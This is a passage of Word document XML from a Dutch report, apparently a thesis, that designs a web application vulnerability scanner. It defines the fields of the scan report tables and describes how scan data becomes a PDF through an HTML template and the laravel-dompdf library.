          </w:tcPr>
          <w:p w14:paraId="02F091A8" w14:textId="4291655F" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="1944AAD9" w14:textId="53F77D37" w:rsidTr="00756B56">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="114DDAB5" w14:textId="530082F8" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Start tijd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72CC0E12" w14:textId="73B5A1DB" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Start tijd van de scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="4A02968F" w14:textId="7C245B16" w:rsidTr="00756B56">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5B064B" w14:textId="63583DA7" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Eind tijd</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="110D65AF" w14:textId="3FC845F4" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Eind tijd</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> van de scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="6A9C2593" w14:textId="0DE8D706" w:rsidTr="00756B56">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6056B753" w14:textId="4B422D66" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Scan tijd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79C3E103" w14:textId="013082C0" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>De duur van de scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="6B24F811" w14:textId="2FC87DA9" w:rsidTr="00756B56">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="035A716A" w14:textId="44D473F4" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Profiel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FBDB065" w14:textId="3D14C2D0" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Welke type van de scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="233AC87E" w14:textId="6D2D3AC9" w:rsidTr="00756B56">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0162DFAC" w14:textId="5C6E9C4F" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="492B752B" w14:textId="60826ED8" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>De URL van het Doelwit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="101AC3AA" w14:textId="42FBC609" w:rsidTr="00756B56">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1844" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C9A186E" w14:textId="1A6F732B" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2876" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EA80D7F" w14:textId="06E32C23" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>De server waarop gehost wordt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="04B47C3C" w14:textId="547D53DA" w:rsidR="00687310" w:rsidRDefault="00390F17" w:rsidP="008571B9">
      <w:r>
        <w:t>Tabel 4.14</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="6616" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3111"/>
        <w:gridCol w:w="3505"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A654A" w14:paraId="55E7AB09" w14:textId="77777777" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="0F6344AE" w14:textId="3A19820B" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t xml:space="preserve">Scan </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>Informatie pagina</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="2EECD54E" w14:textId="77777777" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3111" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4083903D" w14:textId="4EBFD5E5" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Veld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12415B6A" w14:textId="307D93C0" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="7A5B47CA" w14:textId="3B114C10" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3111" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6B5DBB5E" w14:textId="2F1F48F7" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Dreiginsniveau</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05E9EDFA" w14:textId="5421021F" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Niveau van dreiging. Hoog, gemiddeld, laag</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="541577FE" w14:textId="0AA69F45" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3111" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1ADE0486" w14:textId="41A6FEA6" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Totale dreigementen gevonden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52605122" w14:textId="1A5FFCE9" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>e.g. 25 dreigementen gevonden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="0C67E2E0" w14:textId="5E660859" w:rsidTr="007A654A">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3111" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D059B9" w14:textId="08775CAE" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Samenvatting van de dreigementen</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3505" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="180ED757" w14:textId="2C884ED4" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Dit bevat een overzicht van elke gevonden dreigement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="362DB7A2" w14:textId="21892916" w:rsidR="00390F17" w:rsidRDefault="00390F17" w:rsidP="008571B9">
      <w:r>
        <w:t>Tabel 4.15</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="6655" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1452"/>
        <w:gridCol w:w="5203"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A654A" w14:paraId="661793AF" w14:textId="77777777" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6655" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="23EB6B4D" w14:textId="4075CD2D" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Kwetsbaarheden details</w:t>
            </w:r>
            <w:r w:rsidR="00837443">
              <w:t xml:space="preserve"> pagina </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00837443">
              <w:t>2..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00837443">
              <w:t>n</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="4C98820C" w14:textId="77777777" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63158029" w14:textId="11C1D629" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Veld</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AE27F08" w14:textId="5441A787" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="6842AFA1" w14:textId="632B63BD" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCCF393" w14:textId="21240C27" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Kwetsbaarheid</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AA93428" w14:textId="638A0EA2" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t xml:space="preserve">Naam van kwetsbaarheid e.g. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="0844DEFD" w14:textId="57DE9602" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6158B02B" w14:textId="7EF30101" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="226B450E" w14:textId="7ECEEDE9" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Omschrijving van kwetsbaarheid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="68F80343" w14:textId="1F2EBEED" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="552B4C87" w14:textId="4B7A7AD6" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7923AEDB" w14:textId="3017FAB8" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Locatie waar kwetsbaarheid is gevonden</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="0B5C0EB3" w14:textId="686D2CA9" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="280D34A6" w14:textId="4C4024B1" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Aanval</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DA984E5" w14:textId="22FA3D09" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>De URI waarmee er een aanval is verricht</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="7DCECC33" w14:textId="116AAB38" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A94112E" w14:textId="703A96CE" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D63EED8" w14:textId="75045417" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t xml:space="preserve">Wat voor impact kan het hebben op een </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>web applicatie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="0149C177" w14:textId="13A3DA75" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22D42626" w14:textId="0F338278" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Oplossing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FC8469D" w14:textId="421ADDAF" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Korte oplossing van het probleem</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="39B6782E" w14:textId="7D8A90B4" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="113BA9BD" w14:textId="282D61CA" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>WASC ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38EB660B" w14:textId="5DA02423" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Referentie ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A654A" w14:paraId="2A6F886E" w14:textId="19A0E2A2" w:rsidTr="007A654A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1452" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49948DBA" w14:textId="6F0218D2" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Referentie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5203" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630DFB53" w14:textId="7C552466" w:rsidR="007A654A" w:rsidRDefault="007A654A" w:rsidP="008571B9">
            <w:r>
              <w:t>Hyperlinks die naar bronnen leiden over de kwetsbaarheid</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7EC3A5C4" w14:textId="32BB489D" w:rsidR="000C51FC" w:rsidRDefault="00390F17" w:rsidP="008571B9">
      <w:r>
        <w:t>Tabel 4.16</w:t>
      </w:r>
      <w:r w:rsidR="005F2DB1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341C77CC" w14:textId="77777777" w:rsidR="00230D87" w:rsidRDefault="00230D87" w:rsidP="00B3103C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="432CA60D" w14:textId="77777777" w:rsidR="00230D87" w:rsidRDefault="00230D87" w:rsidP="00B3103C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5649FE59" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRPr="008D42FC" w:rsidRDefault="00B3103C" w:rsidP="00B3103C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D42FC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Het genereren van het rapport</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF86E1" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00B3103C">
      <w:r>
        <w:t xml:space="preserve">Het genereer proces heeft als doel om de data van een gescande website te verwerken in een rapport van pdf-formaat. De Web Applicatie Scanner heeft hiervoor een feature dat </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTML documenten</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> converteren in pdf-formaten. Dit betekent dat ik de scan data als eerst moet verwerken in een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTML documenten</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. Een voordeel hiervan is dat de pdf-bestand met HTML en CSS opgemaakt kan worden. Na het converteren wordt het pdf-bestand opgeslagen op de server om vanuit daar opgestuurd te worden naar de klant. Het </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTML document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wordt zelf ook gegenereerd, hiervoor gebruikt het software systeem een dynamische template. Om de HTML en pdf-documenten te genereren wordt er gebruik gemaakt van twee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Laravel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Libraries:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4531"/>
        <w:gridCol w:w="4531"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B3103C" w14:paraId="6EADA78B" w14:textId="77777777" w:rsidTr="00146C9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BD64AD1" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00146C9D">
            <w:r>
              <w:t>Libraries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27010F1E" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00146C9D">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B3103C" w14:paraId="568C6C3A" w14:textId="77777777" w:rsidTr="00146C9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="170181CD" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00146C9D">
            <w:r>
              <w:t>HTML Builder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FDD4428" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00146C9D">
            <w:r>
              <w:t xml:space="preserve">Voor het genereren van </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>HTML documenten</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B3103C" w14:paraId="7400CA77" w14:textId="77777777" w:rsidTr="00146C9D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6420C1AA" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00146C9D">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Laravel-dompdf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B2735E" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00146C9D">
            <w:r>
              <w:t>Voor het genereren van pdf-documenten</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D6437F5" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00B3103C">
      <w:r>
        <w:t>Tabel 4.17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C38E3D" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00B3103C">
      <w:r>
        <w:t xml:space="preserve">In het eerste proces wordt met de template die ontwikkeld is met de HTML Builder een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTML document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gemaakt. De data dat de Scanner component heeft opgeslagen wordt verwerkt in de gegenereerde </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTML document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">. In het volgende proces wordt de </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTML document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> geconverteerd naar pdf formaat met DOM-PDF.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3134AB01" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00B3103C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252025856" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="73D1BD4E" wp14:editId="50584DD9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>561975</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>196215</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4572635" cy="4335145"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:wrapTopAndBottom/>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genereren van een rapport.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572635" cy="4335145"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C910DF8" w14:textId="77777777" w:rsidR="00B3103C" w:rsidRDefault="00B3103C" w:rsidP="00B3103C">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252026880" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66AF690D" wp14:editId="725E1526">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>562610</wp:posOffset>
                </wp:positionH>
